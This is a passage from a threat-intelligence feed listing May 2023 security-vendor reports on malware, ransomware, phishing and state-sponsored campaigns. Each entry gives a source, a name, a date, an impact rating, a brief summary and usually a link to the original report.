- SentinelOne researchers have observed a campaign targeting users of Portuguese financial institutions conducted by a Brazilian threat group. The attackers can steal credentials and exfiltrate users’ data and personal information, which can be leveraged for malicious activities beyond financial gain.
—
- Intel Source:
- CADO Security
- Intel Name:
- Legion_Malware_Targeting_SSH_Servers_and_AWS_Credentials
- Date of Scan:
- 2023-05-29
- Impact:
- LOW
- Summary:
- CADO security researchers have identified an updated version of the commodity malware called Legion comes with expanded features to compromise SSH servers and Amazon Web Services (AWS) credentials associated with DynamoDB and CloudWatch.
Source:
https://www.cadosecurity.com/updates-to-legion-a-cloud-credential-harvester-and-smtp-hijacker/
—
- Intel Source:
- Trustwave
- Intel Name:
- Phishing_Delivering_via_Encrypted_Messages
- Date of Scan:
- 2023-05-28
- Impact:
- MEDIUM
- Summary:
- Trustwave researchers have observed phishing attacks that use a combination of compromised Microsoft 365 accounts and .rpmsg encrypted emails to deliver the phishing message.
—
- Intel Source:
- Sentilone
- Intel Name:
- Ongoing_Kimsuky_Campaign_Utilizing_Custom_Reconnaissance_Toolkit
- Date of Scan:
- 2023-05-27
- Impact:
- MEDIUM
- Summary:
- SentinelLabs have tracking a targeted campaign against information services, as well as organizations supporting human rights activists and defectors in relation to North Korea. The campaign focuses on file reconnaissance, and exfiltrating system and hardware information, laying the groundwork for subsequent precision attacks.
Source:
https://www.sentinelone.com/labs/kimsuky-ongoing-campaign-using-tailored-reconnaissance-toolkit/
—
- Intel Source:
- Cofense
- Intel Name:
- Resurgence_of_Vacation_Request_Phishing_Emails_in_Summer_Time_Scams
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Cofense researchers have observed a phishing campaign where the threat actor sent an email to a user that claimed to be from the HR Department’ and provided the user with a link to submit their annual leave requests.
Source:
https://cofense.com/blog/summer-time-scams-the-return-of-vacation-request-phishing-emails/
—
- Intel Source:
- Zscaler
- Intel Name:
- The_Technical_Examination_of_Pikabot
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have identified a new malware trojan named Pikabot which emerged in early 2023 that consists of two components a loader and a core module.
Source:
https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot
—
- Intel Source:
- ASEC
- Intel Name:
- Link_Found_Between_Korean_VPN_Installations_and_MeshAgent_Infections
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has previously covered the case where SparkRAT was distributed contained within a Korean VPN’s installer in the post, “SparkRAT Being Distributed Within a Korean VPN Installer”[1]. This VPN was commonly installed by Chinese users who required better access to the Internet, and the problem was addressed after the blog post was uploaded.
—
- Intel Source:
- ClearSky
- Intel Name:
- Israeli_Logistics_Industry_attacked_by_hackers
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- ClearSky Cyber Security reserachers has discovered a watering hole attack on at least eight Israeli websites. The attack most likely was orchestrated by a nation-state actor from Iran, with some attribution to Tortoiseshell (also called TA456 or Imperial Kitten). The Infected sites collect preliminary user information through a script. W
—
- Intel Source:
- Mandiant
- Intel Name:
- COSMICENERGY_new_OT_Malware_related_to_Russia
- Date of Scan:
- 2023-05-27
- Impact:
- MEDIUM
- Summary:
- Mandiant discovered a new operational technology (OT) / industrial control system (ICS) malware, which was recognized as COSMICENERGY, uploaded by threat actor in Russia. The malware is capable of to cause electric power disruption by interacting with IEC 60870-5-104 (IEC-104) devices, such as remote terminal units (RTUs), that are commonly leveraged in electric transmission and distribution operations in Europe, the Middle East, and Asia.
Source:
https://www.mandiant.com/resources/blog/cosmicenergy-ot-malware-russian-response
—
- Intel Source:
- Microsoft, CISA
- Intel Name:
- Volt_Typhoon_stealthy_activity
- Date of Scan:
- 2023-05-27
- Impact:
- HIGH
- Summary:
- Microsoft has discovered sneaky and malicious activity that targets on credential access and network system discovery attacking critical infrastructure organizations in the United States. The attack is carried out by Volt Typhoon, a state-sponsored actor based in China that focuses on espionage and information stealing. Microsoft is sure that this Volt Typhoon campaign is targeting development of capabilities that could disrupt critical communications infrastructure between the United States and Asia region during future crises.
—
- Intel Source:
- ClearSky
- Intel Name:
- Israeli_Logistics_Industry_targeted_by_hackers
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- ClearSky Cyber Security reserachers has discovered a watering hole attack on at least eight Israeli websites. The attack most likely was orchestrated by a nation-state actor from Iran, with some attribution to Tortoiseshell (also called TA456 or Imperial Kitten). The Infected sites collect preliminary user information through a script.
—
- Intel Source:
- Cluster25
- Intel Name:
- Return_of_BlackByte_Ransomware_with_New_Technology_Version
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Cluster25 Threat Intel Team have identified that BlackByte is a Ransomware-as-a-Service group that is known for the use of the homonymous malware that is constantly updated and spread in different variants. The team used the above function in a IDAPython script that allowed to retrieve all invocations to the functions responsible for the dynamic loading of the APIs in order to continue with the static analysis of the malware.
Source:
https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt
—
- Intel Source:
- Checkpoint
- Intel Name:
- Agrius_threat_actor_attacks_against_Israel
- Date of Scan:
- 2023-05-27
- Impact:
- MEDIUM
- Summary:
- A threat actor Agrius who is believed Iranian keep trying to attack against Israeli targets, hiding destructive impact of ransomware attacks.Recently the group deployed Moneybird, a new ransomware written in C++. Despite calling themselves as a new group name– Moneybird, this is yet another Agrius alias.
—
- Intel Source:
- Cyble
- Intel Name:
- Over_200_Corporate_Victims_Hit_by_New_Ransomware_Wave
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) discovered the increasing adoption of double extortion by ransomware groups is an alarming trend. We are witnessing a surge in ransomware attacks that not only encrypt valuable corporate data but also involve the threat of public exposure unless the attackers’ demands are fulfilled.
Source:
https://blog.cyble.com/2023/05/23/new-ransomware-wave-engulfs-over-200-corporate-victims/
—
- Intel Source:
- Cyble
- Intel Name:
- Cyber_Crime_Forum_Offers_DDoS_As_A_Service_by_Russian_Hacktivists
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) has made a significant discovery on a cybercrime forum – a newly identified malware strain called “MDBotnet.” Our analysis suggests that this malware is believed to originate from a Threat Actor (TA) linked to Russia.
Source:
https://blog.cyble.com/2023/05/23/new-mdbotnet-unleashes-ddos-attacks/
—
- Intel Source:
- Sekoia
- Intel Name:
- Raccoon_and_Vidar_Stealers_Spreading_Fake_Cracked_Software
- Date of Scan:
- 2023-05-26
- Impact:
- MEDIUM
- Summary:
- Sekoia researchers have identified the infection chain that is using about a hundred fake cracked software catalog websites that redirect to several links before downloading the payload hosted on file share platforms, such as GitHub.
—
- Intel Source:
- Securelist
- Intel Name:
- Diving_Deep_into_GoldenJackal_APT_Group
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- Securelist researchers have monitored the GoldenJackal APT Group since mid-2020 and have observed a constant level of activity that indicates a capable and stealthy actor. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo, and JackalScreenWatcher.
Source:
https://securelist.com/goldenjackal-apt-group/109677/
—
- Intel Source:
- Checkpoint
- Intel Name:
- Distribution_of_DarkCloud_Infostealer_Through_Spam_Emails_Detected
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- Checkpoint researchers have identified that malware developers strive to create new threats that can bypass the defenses of antivirus products. “Packing” and “crypting” services are specifically designed to resist analysis. GuLoader is one of the most prominent services cybercriminals use to evade antivirus detection.
Source:
https://research.checkpoint.com/2023/cloud-based-malware-delivery-the-evolution-of-guloader/
—
- Intel Source:
- ASEC
- Intel Name:
- StrelaStealer_Malware_Targeting_Spanish_Users
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- ASEC researchers have observed that the StrelaStealer Infostealer is distributed to Spanish users. It was initially discovered around November 2022 and distributed as an attachment to spam emails.
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_Group_Targeting_Windows_IIS_Web_Servers
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that the Lazarus group is known to receive support on a national scale, carrying out attacks against Windows IIS web servers.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Espionage_Activity_UAC_0063
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- CERT-UA researchers have observed that on 04/18/2023 and 04/20/2023, e-mails were sent to the department’s e-mail address from the official mailbox of the Embassy of Tajikistan in Ukraine (probably as a result of the latter being compromised), the first of which contained an attachment in the form of a document with a macro, and the second – reference to the same document.
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_DarkCloud_Infostealer_Through_Spam_Emails
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the DarkCloud malware is distributed via spam email. It is an Infostealer that steals account credentials saved on infected systems, and the threat actor installed ClipBanker alongside DarkCloud.
—
- Intel Source:
- Fortinet
- Intel Name:
- Middle_East_Targeted_by_New_Kernel_Driver_Exploit
- Date of Scan:
- 2023-05-24
- Impact:
- LOW
- Summary:
- Fortinet researchers have discovered suspicious executables that make use of open-source tools and frameworks. One of the things that we keep an eye out for is tools that use the Donut project. Donut is a position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters.
Source:
https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries
—
- Intel Source:
- Esentire
- Intel Name:
- BatLoader_Campaign_Impersonates_ChatGPT_and_Midjourney_to_Deliver_Redline_Stealer
- Date of Scan:
- 2023-05-22
- Impact:
- LOW
- Summary:
- Esentire researchers have observed threat actors are using BatLoader in the form of MSIX Windows App Installer files to deliver the Redline Stealer.
Source:
https://www.esentire.com/blog/batloader-impersonates-midjourney-chatgpt-in-drive-by-cyberattacks
—
- Intel Source:
- DFIR Report
- Intel Name:
- IcedID_Macro_Ends_in_Nokoyawa_Ransomware
- Date of Scan:
- 2023-05-22
- Impact:
- LOW
- Summary:
- Researchers from DFIR Report have identified an incident taking place during Q4 of 2022 consisting of threat actors targeting Italian organizations with Excel maldocs that deploy IcedID. The threat actors deploying such a campaign may hope to target organizations who have not updated their Microsoft Office deployments after the newly released patches to block macros on documents downloaded from the internet.
Source:
https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/
—
- Intel Source:
- TrendMicro
- Intel Name:
- New_Signed_Kernel_Driver_Deployed_BlackCat_Ransomware
- Date of Scan:
- 2023-05-22
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have analyzed the BlackCat ransomware incident that occurred in February 2023, where they observed a new capability, mainly used for the defense evasion phase, that overlaps with the earlier malicious drivers disclosed by the three vendors.
—
- Intel Source:
- Wordfence
- Intel Name:
- Hackers_Targeting_Vulnerable_WordPress_Elementor_plugin_Versions
- Date of Scan:
- 2023-05-22
- Impact:
- LOW
- Summary:
- Wordfence researchers have identified Several versions of the WordPress plugin Essential Addons for Elementor impacted by the now-addressed critical CVE-2023-32243 vulnerability are being actively scanned and targeted by threat actors following the release of proof-of-concept exploit.
—
- Intel Source:
- Sophos
- Intel Name:
- Brute_Ratel_remains_rare_and_targeted
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- The commercial attack tool’s use by threat actors has faded after an initial flurry, while Cobalt Strike remains the go-to post-exploitation tool for many.
Source:
https://news.sophos.com/en-us/2023/05/18/the-phantom-menace-brute-ratel-remains-rare-and-targeted/
—
- Intel Source:
- Cyble
- Intel Name:
- CapCut_s_Video_to_Deliver_Multiple_Stealers
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- Cyble Researchers recently discovered a couple of phishing websites disguised as video editing software. These ffake sites lure users into downloading and executing various types of malware families such as stealers, RAT, etc. In these campaigns, Threat Actors targeted the CapCut video editing tool, a product of ByteDance, the same parent company that owns TikTok.
Source:
https://blog.cyble.com/2023/05/19/capcut-users-under-fire/
—
- Intel Source:
- Cyble
- Intel Name:
- AndoryuBot_s_DDOS_wild_behavior
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- The Cyble group observed active exploitation of CVE-2023-25717 and deployment of AndoryuBot. This incident indicates that Threat Actors are actively looking for vulnerable Ruckus assets for exploitation purposes. AndoryuBot is a new Botnet malware sold on Telegram on a subscription basis. The deployment of such malware by TAs allows them to orchestrate large-scale DDoS attacks, which can overwhelm targeted servers and infrastructure by flooding them with a massive volume of traffic.
Source:
https://blog.cyble.com/2023/05/17/andoryubots-ddos-rampage/
—
- Intel Source:
- Bushidotoken
- Intel Name:
- Distributing_DarkCrystal_RAT_by_fake_Desktop_Authenticator_App
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- The Bushitoken reseracher recently discovered an threat actor campaign that is using fake websites to distribute malware. It seems like this TTP to be on the rise. A suspected Russia-based threat actor tried to duplicate the website of a legitimate open-source desktop app called Steam Desktop Authenticator which is simply a convenient desktop version of the mobile authenticator app.
Source:
https://blog.bushidotoken.net/2023/05/fake-steam-desktop-authenticator-app.html
—
- Intel Source:
- Reversing Labs
- Intel Name:
- TurkoRat_found_hiding_in_the_npm_package
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- ReversingLabs researchers found two malicious packages that contained TurkoRat, an open source infostealer that lurked on npm for two months before being detected.
Source:
https://www.reversinglabs.com/blog/rats-found-hiding-in-the-npm-attic
—
- Intel Source:
- Cofense
- Intel Name:
- The_attackers_used_email_security_providers_for_spreading_phishing_attacks
- Date of Scan:
- 2023-05-18
- Impact:
- LOW
- Summary:
- Threat actors more often send malicious URLs within HTML attachments, which makes it more challenging for Secure Email gateways (SEGs) to block them. The Phishing Defence Centre did their analyses on a phishing campaign impersonating email security provider to trap recipients into providing their user credentials via malicious HTML attachment.
—
- Intel Source:
- Cyble
- Intel Name:
- BlackSuit_Ransomware_ragets_VMware_ESXi_servers
- Date of Scan:
- 2023-05-18
- Impact:
- HIGH
- Summary:
- Cyble researchers from Labs observed an increase in the number of ransomware groups such as Cylance and Royal ransomware. The widespread use of Linux makes it an appealing target for ransomware groups, as a single attack can potentially compromise numerous systems.
Source:
https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/
—
- Intel Source:
- Wordfence
- Intel Name:
- The_exploitation_of_critical_vulnerability_CVE_2023_32243
- Date of Scan:
- 2023-05-18
- Impact:
- HIGH
- Summary:
- Recently, Essential Addons for Elementor, a WordPress plugin had a released a patch for a critical vulnerability which is capable for any unauthenticated user to reset arbitrary user passwords, including user accounts with administrative-level access. This vulnerability was discovered and responsibly disclosed by security researcher Rafie Muhammed.
—
- Intel Source:
- Team Cymru
- Intel Name:
- The_analysis_of_QakBot_Infrastructure
- Date of Scan:
- 2023-05-18
- Impact:
- MEDIUM
- Summary:
- Team Cymru shared their research about their analysis of QakBot is full of various hypotheses being identified and tested. Their key findings are QakBot C2 servers are not separated by affiliate ID, QakBot C2 servers from older configurations continue to communicate with upstream C2 servers months after being used in campaigns and Identification of three upstream C2 servers located in Russia, two of which behave similarly based on network telemetry patterns and the geolocations of the bot C2s communicating with them.
Source:
https://www.team-cymru.com/post/visualizing-qakbot-infrastructure
—
- Intel Source:
- ASEC
- Intel Name:
- The_Korean_VPN_installer_is_being_used_to_distribute_SparkRAT
- Date of Scan:
- 2023-05-18
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Emergency response Center (ASEC) has recently discovered SparkRAT being distributed within the installer of a certain VPN program. SparkRAT is a Remote Administration Tool (RAT) developed with GoLang. When installed on a user’s system, it can perform a variety of malicious behaviors, such as executing commands remotely, controlling files and processes, downloading additional payloads, and collecting information from the infected system like by taking screenshots.
—
- Intel Source:
- CISA
- Intel Name:
- Joint_Cybersecurity_Advisory_on_BianLian_Ransomware_Group
- Date of Scan:
- 2023-05-18
- Impact:
- MEDIUM
- Summary:
- The FBI, CISA and Australian Cyber Security Centre (ACSC) released the joint Cybersecurity Advisory to disseminate known BianLian ransomware and data extortion group IOCs and TTPs identified through FBI and ACSC investigations back in March 2023. BianLian is a ransomware developer, deployer, and data extortion cybercriminal group that has targeted organizations in multiple U.S. critical infrastructure sectors since June 2022. They have also targeted Australian critical infrastructure sectors in addition to professional services and property development.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a
—
- Intel Source:
- Fortinet
- Intel Name:
- Malicious_Python_Packages_via_Supply_Chain_Attacks
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- The FortiGuard Labs team discovered over 30 new zero-day attacks in PyPI packages (Python Package Index). These were found between late March and late April by monitoring an open-source ecosystem.
—
- Intel Source:
- Symantec
- Intel Name:
- The_Lancefly_APT_group_using_Merdoor_backdoor
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- The Lancefly (APT) group is attacking and target organizations in South and Southeast Asiausing with a custom-written backdoor. Lancefly’s custom malware is named Merdoor, is a powerful backdoor that existed since 2018. The recent targets lately are based in South and Southeast Asia, attacking areas including government, aviation, education, and telecoms. Symantec researchers observed that activity also appeared to be highly targeted, with only a small number of machines infected.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Uncovering_RedStinger_new
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- During the conflict between Russia and Ukraine began last year, there is a not only political conflict, there is no surprise that the cybersecurity landscape between these two countries has also been tense. The former reseracher from Malwarebytes Threat Intelligence Team discovered a new interesting bait that targeted the Eastern Ukraine region and reported that finding to the public and tracked this actor as Red Stinger. These findings remained private for a while, but Kaspersky recently shared information about the same actor (who it called Bad Magic).
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger
—
- Intel Source:
- TrendMicro
- Intel Name:
- New_8220_Gang_Strategies
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- Reserachers documentedon the gang’s recent activities of 8220 Gang who has been active in recent months. Researchers shared in their article aboutk observed attack exploiting the Oracle WebLogic vulnerability CVE-2017-3506 captured by one of our honeypots. This vulnerability, with a CVSS score of 7.4, impacts the WLS Security Component of Oracle WebLogic, and when exploited can enable attackers to execute arbitrary commands through an HTTP request remotely with a specifically crafted XML document.
Source:
https://www.trendmicro.com/en_us/research/23/e/8220-gang-evolution-new-strategies-adapted.html
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Water_Orthrus_s_New_Campaigns
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have been monitoring the activities of a threat actor named Water Orthrus, which spreaded CopperStealer malware via pay-per-install (PPI) networks. In March 2023, we observed two campaigns delivering new malware that we named CopperStealth and CopperPhish. Both malware have characteristics that are close to those of CopperStealer and are likely developed by the same author, leading the researchers believe that these campaigns are likely Water Orthrus’ new activities.
—
- Intel Source:
- Securonix
- Intel Name:
- Ongoing_Phishing_Campaign_uses_Meme_Filled_Code_to_Drop_XWorm_Payloads
- Date of Scan:
- 2023-05-16
- Impact:
- MEDIUM
- Summary:
- Last couple months was observed an interesting and ongoing attack campaign which was identified and tracked by the Securonix Threat Research team. The attack campaign (tracked by Securonix as MEME#4CHAN) was leveraging rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims. Securonix dived into this campaign by taking an in-depth technical analysis.
Source:
https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_ransomware_variant_Rancoz
- Date of Scan:
- 2023-05-16
- Impact:
- LOW
- Summary:
- This month Cyble researchers onserved a ransomware variant called Rancoz, that was identified by a researcher @siri_urz. During the investigation, it has been observed that this ransomware is similar and overlaps with the Vice Society ransomware.
Source:
https://blog.cyble.com/2023/05/11/dissecting-rancoz-ransomware/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Eastern_European_APT_Cyber_Operations_Undetected_Since_2020
- Date of Scan:
- 2023-05-16
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have discovered a new interesting lure that targeted the Eastern Ukraine region and reported that finding to the public. Moreover, we started tracking the actor behind it, which we internally codenamed Red Stinger.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger
—
- Intel Source:
- ASEC
- Intel Name:
- LokiLocker_Ransomware_Distributed_in_Korea
- Date of Scan:
- 2023-05-16
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Emergency response Center(ASEC) has confirmed the distribution of the LokiLocker ransomware in Korea. This ransomware is almost identical to the BlackBit ransomware and their common traits
—
- Intel Source:
- Malware Bytes
- Intel Name:
- The_Aurora_stealer_via_Invalid_Printer_loader
- Date of Scan:
- 2023-05-16
- Impact:
- LOW
- Summary:
- Malware Bytes Lab shared their discovery about this malicious campaing and its connections to other attacks. They discovered that a threat actor was using malicious ads to redirect users to what looks like a Windows security update. The scheme looked very legit ans very much resembled what you’d expect from Microsoft. That fake security update was using a newly identified loader that at the time of the campaign was oblivious to malware sandboxes and bypassed practically all antivirus engines. Malware Bytes Lab tool patched that loader and identified its actual payload as Aurora stealer.
—
- Intel Source:
- Fortinet
- Intel Name:
- Maori_Ransomware
- Date of Scan:
- 2023-05-16
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs recently came across a new ransomware variant called Maori. Like other ransomware variants, it encrypts files on victims’ machines to extort money. Interestingly, this variant is designed to run on Linux architecture and is coded in Go, which is somewhat rare and increases the analysis difficulty
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-maori?&web_view=true
—
- Intel Source:
- Cyble
- Intel Name:
- An_In_Depth_Look_at_Akira_Ransomware
- Date of Scan:
- 2023-05-16
- Impact:
- MEDIUM
- Summary:
- Cyble researchers have come across a Reddit post about a new ransomware variant named “Akira”, actively targeting numerous organizations and exposing their sensitive data. To increase the chances of payment from victims, Akira ransomware exfiltrates and encrypts their data using a double-extortion technique. The attackers then threaten to sell or leak the stolen data on the dark web if the ransom is not paid for decrypting the data.
Source:
https://blog.cyble.com/2023/05/10/unraveling-akira-ransomware/
—
- Intel Source:
- Deep Instinct Blog
- Intel Name:
- A_new_undetected_variant_of_Linux_Backdoor_BPFDoor
- Date of Scan:
- 2023-05-15
- Impact:
- MEDIUM
- Summary:
- BPFdoor is a Linux-specific, low-profile, passive backdoor intended to maintain a persistent, long-term foothold in already-breached networks and environments and functions primarily to ensure an attacker can re-enter an infected system over an extended period of time, post-compromise.
Source:
https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
—
- Intel Source:
- CISA
- Intel Name:
- Exploitation_of_CVE_2023_27350
- Date of Scan:
- 2023-05-14
- Impact:
- LOW
- Summary:
- The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-27350. This vulnerability occurs in certain versions of PaperCut NG and PaperCut MF and enables an unauthenticated actor to execute malicious code remotely without credentials.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a
—
- Intel Source:
- Mcafee
- Intel Name:
- Analysis_of_a_evasive_Shellcode
- Date of Scan:
- 2023-05-14
- Impact:
- LOW
- Summary:
- McAfee researchers have observed a NSIS-based installers delivered via E-mail as malspam that use plugin libraries to execute the GU shellcode on the victim system
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Statistics_May_1_7th_2023
- Date of Scan:
- 2023-05-13
- Impact:
- LOW
- Summary:
- ASEC lab researchers continiusly monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from April 9th, 2023 to April 15st, 2023 and provide statistical information on each type.
—
- Intel Source:
- Dragos
- Intel Name:
- A_cybercriminal_group_attempted_an_extortion_scheme_against_Dragos
- Date of Scan:
- 2023-05-13
- Impact:
- LOW
- Summary:
- Last week, an known hacker group tried and didn’t have a success at an extortion scheme against Dragos. Nothing was breached at Dragos systems, including anything related to the Dragos Platform. Dragos has shared what happened during a recent incident of failed extortion scheme against them – Dragos. The cybercriminal group attempted to compromise Drago’s information resources. The criminal group got access by compromising the personal email address of a new sales employee prior to their start date, and subsequently used their personal information to impersonate the Dragos employee and accomplish initial steps in the employee onboarding process.
Source:
https://www.dragos.com/blog/deconstructing-a-cybersecurity-event/
—
- Intel Source:
- Sentinelone
- Intel Name:
- Threat_Actors_Build_ESXi_Lockers_Using_Leaked_Babuk_Code
- Date of Scan:
- 2023-05-13
- Impact:
- MEDIUM
- Summary:
- SentinelLabs researchers have identified unexpected connections between ESXi ransomware families, exposing likely relationships between Babuk and more illustrious operations like Conti and REvil.
—
- Intel Source:
- Fortinet
- Intel Name:
- An_Expansion_of_RapperBot_DDoS_Botnet_into_Cryptojacking
- Date of Scan:
- 2023-05-12
- Impact:
- LOW
- Summary:
- FortiGate researchers have analyzed new samples of the RapperBot campaign active since January 2023. The threat actors have started venturing into cryptojacking, specifically for Intel x64 machines. Initially, they deployed and executed a separate Monero cryptominer alongside the usual RapperBot binary. But in late January 2023, they combined both functionalities into a single bot.
Source:
https://www.fortinet.com/blog/threat-research/rapperbot-ddos-botnet-expands-into-cryptojacking
—
- Intel Source:
- Bitdefender
- Intel Name:
- DownEx_Espionage_activity_in_Central_Asia
- Date of Scan:
- 2023-05-12
- Impact:
- MEDIUM
- Summary:
- Last year Bitdefender Labs reserchers observed an attack on foreign government institutions in Kazakhstan. During the analyses, it was disovered that this was a highly targeted attack to get an access to exfiltrate data. Bitdefender Labs reserchers did moitored for awhile it and the region for other similar attacks. Recently they detected another attack in Afghanistan and collected additional samples and observations.
—
- Intel Source:
- ASEC
- Intel Name:
- CLR_SqlShell_malware_Attack_MS_SQL_Servers
- Date of Scan:
- 2023-05-12
- Impact:
- MEDIUM
- Summary:
- ASEC analyzed the CLR SqlShell malware that is being used to target MS-SQL servers. Similar to WebShell, which can be installed on web servers, SqlShell is a malware strain that supports various features after being installed on an MS-SQL server, such as executing commands from threat actors and carrying out all sorts of malicious behavior.
—
- Intel Source:
- Mcafee
- Intel Name:
- The_Examination_of_Highly_Evasive_Shellcode_Based_Loader
- Date of Scan:
- 2023-05-12
- Impact:
- LOW
- Summary:
- McAfee researchers have deeply analyzed the GULoader campaigns and found, a rise in NSIS-based installers delivered via E-mail as malspam that use plugin libraries to execute the GU shellcode on the victim system.
—
- Intel Source:
- Cert-PL
- Intel Name:
- Malspam_Campaign_Delivering_PowerDash
- Date of Scan:
- 2023-05-12
- Impact:
- LOW
- Summary:
- CERT-PL researchers have observed a malspam campaign delivering previously unseen PowerShell malware. They also dubbed this malware family as “PowerDash” because of the “/dash” path on C2 server, used as a gateway for bots.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Royal_Ransomware_Expands_to_Target_Linux_and_VMware_ESXi
- Date of Scan:
- 2023-05-10
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have observed that the Royal ransomware group has recently launched a variant of its encryptor malware built in the form of executable and linkable format (ELF) binary. Also, they started using the BatLoader dropper and SEO poisoning for initial access.
Source:
https://unit42.paloaltonetworks.com/royal-ransomware/
—
- Intel Source:
- Abnormal
- Intel Name:
- Taking_a_Closer_Look_at_Israel_Based_BEC_Attacks
- Date of Scan:
- 2023-05-10
- Impact:
- HIGH
- Summary:
- Researchers from Abnormal Security have discovered that an Israel-based threat group has conducted 350 BEC campaigns since February 2021, with email attacks targeting employees from 61 countries across six continents.
—
- Intel Source:
- Cofense
- Intel Name:
- MitM_Phishing_Growing_and_Using_Real_Login_Process_to_Steal_Credentials
- Date of Scan:
- 2023-05-10
- Impact:
- LOW
- Summary:
- Cofense researchers have observed Man-in-the-middle attacks are increasing rapidly and identified a 35% increase in volume reaching inboxes between Q1 2022 and Q1 2023, 94% of MitM credential phishing attacks reaching inboxes targeted O365 authentication, and 89% of campaigns used at least one URL redirect, and 55% used two or more.
Source:
https://cofense.com/blog/cofense-intelligence-strategic-analysis-2/
—
- Intel Source:
- Fortinet
- Intel Name:
- AndoryuBot_Targeting_Ruckus_Wireless_Admin_Remote_Code_Execution_Vulnerability
- Date of Scan:
- 2023-05-09
- Impact:
- LOW
- Summary:
- FortiGate researchers have observed a unique botnet based on the SOCKS protocol distributed through the Ruckus vulnerability (CVE-2023-25717). It contains DDoS attack modules for different protocols and communicates with its command-and-control server using SOCKS5 proxies.
—
- Intel Source:
- Blackberry
- Intel Name:
- SideWinder_Using_Server_Based_Polymorphism_Technique
- Date of Scan:
- 2023-05-09
- Impact:
- LOW
- Summary:
- BlackBerry researchers have observed that APT Group SideWinder is accused of deploying a backdoor in attacks directed against Pakistan government organizations as part of a campaign that commenced in late November 2022.
Source:
https://blogs.blackberry.com/en/2023/05/sidewinder-uses-server-side-polymorphism-to-target-pakistan
—
- Intel Source:
- Quickheal
- Intel Name:
- IRCTC_fake_apps
- Date of Scan:
- 2023-05-09
- Impact:
- LOW
- Summary:
- Quickheal analysts went through the recent advisory published by the Indian Railway Catering and Tourism Corporation (IRCTC), about the IRCTC fakeapps. The Fake IRCTC app pretends like it is real IRCTC app but is in reality a full-fledged spyware that spies on victims with ease.
Source:
https://blogs.quickheal.com/beware-fake-applications-are-disguised-as-legitimate-ones/
—
- Intel Source:
- Cofense
- Intel Name:
- Microsoft_Phish_Redirects_Victims_to_Catering_Voice_Recording
- Date of Scan:
- 2023-05-09
- Impact:
- LOW
- Summary:
- Cofense researchers have observed credential phishing campaigns that use a novel deception technique, luring unsuspecting users into a false sense of security after they’ve given away their Microsoft login information.
—
- Intel Source:
- ASEC
- Intel Name:
- RecordBreaker_Stealer_Distributed_by_YouTube_Accounts
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
